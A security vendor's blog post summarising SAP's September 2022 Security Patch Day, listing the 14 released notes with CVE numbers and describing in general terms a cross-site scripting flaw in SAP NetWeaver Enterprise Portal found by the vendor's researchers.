Skip links
Arpine Maghakyan

Arpine Maghakyan

Security Researcher of RedRays.

SAP Security Patch Day – September 2022

Because the SAP threat landscape is always expanding, businesses of all sizes and sectors are in danger of cyberattacks. The following report offers information on the
most recent security flaws and threats.

Summary 

This month, the software provider released 14 SAP Security Notes; Privilege escalation vulnerability in SAP SuccessFactors attachment API for Mobile Application(Android & iOS) is the most severe. It had a rating of 8.1.
At redrays.io, you can find more information about the vulnerabilities and existing measures to protect your SAP systems, and exploits for the most critical vulnerabilities are already available in the RedRays Security Platform’s database.

SAP Security Notes Overview

On the 13th of September 2022, SAP Security Patch Day released 14 new Security Notes. 

Five of the released SAP Security Notes are classified as High Priority. The vulnerabilities have a maximum CVSS score of 8.1.
This month’s two most frequent vulnerability categories are information disclosure and cross-site scripting vulnerabilities. One vulnerability were discovered by our research and development team; and have been patched this month.

One medium vulnerabilities discovered by RedRays researchers this month were patched.

The details of the SAP vulnerability discovered by RedRays researchers are listed below.

  • 3219164: [CVE-2022-35298] Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Enterprise Portal (KMC). 
    A Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Enterprise Portal
    CVSS Base Score: 6.1
    The Vulnerable version is -7.50. An update is available in SAP Security Note 3219164. An attacker can use a Cross-site scripting vulnerability to inject a malicious script into a page. The malicious script can access all cookies, session tokens, and other critical information stored by a browser and used for interaction with a web application. An attacker can gain access to the user session and learn business-critical information. In some cases, it is possible to get control over this information. Also, XSS can be used for unauthorized modifying of displayed content.

The most serious security vulnerabilities in this version can be fixed by using the following SAP Security Notes:

  • 3223392 [CVE-2022-35292] Windows Unquoted Service Path issue in SAP Business One
  • 3219164 [CVE-2022-35298] Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Enterprise Portal (KMC)
  • 3217303 [CVE-2022-39014] Information Disclosure vulnerability in SAP BusinessObjects Business Intelligence Platform (CMC)
  • 3159736 [CVE-2022-35295] Privilege Escalation Vulnerability in SAPOSCOL on Unix
  • 3198137 Update 1 to Security Note 3165333 – [CVE-2022-28215] URL Redirection vulnerability in SAP NetWeaver ABAP Server and ABAP Platform
  • 3126968 Information Disclosure vulnerability in SAP CRM WebClient
  • 2998510 [CVE-2022-28214] Central Management Server Information Disclosure in Business Intelligence Update
  • 3237075 [CVE-2022-39801] Insufficient Firefighter Session Expiration in SAP GRC Access Control Emergency Access Management
  • 3229820 [CVE-2022-39799] Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver AS ABAP (SAP GUI for HTML within the Fiori Launchpad)
  • 3226411 [CVE-2022-35291] Privilege escalation vulnerability in SAP SuccessFactors attachment API for Mobile Application(Android & iOS)
  • 2634023 Missing authorization check in Consumption of CDS Views (or) OData Services in QM-QN
  • 3218177 [CVE-2022-35294] Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Application Server ABAP
  • 3165333 [CVE-2022-28215] URL Redirection vulnerability in SAP NetWeaver ABAP Server and ABAP Platform
  • 3150454 Information Disclosure vulnerability in SAP NetWeaver Application Server ABAP and ABAP Platform

 

Installing all SAP Security Notes is what our team strongly advises to minimize the risk of being compromised

More to explorer

SAP Security Audit Guidelines

It should not be surprising that essential company data stored and processed in ERP systems are susceptible to various forms of assault.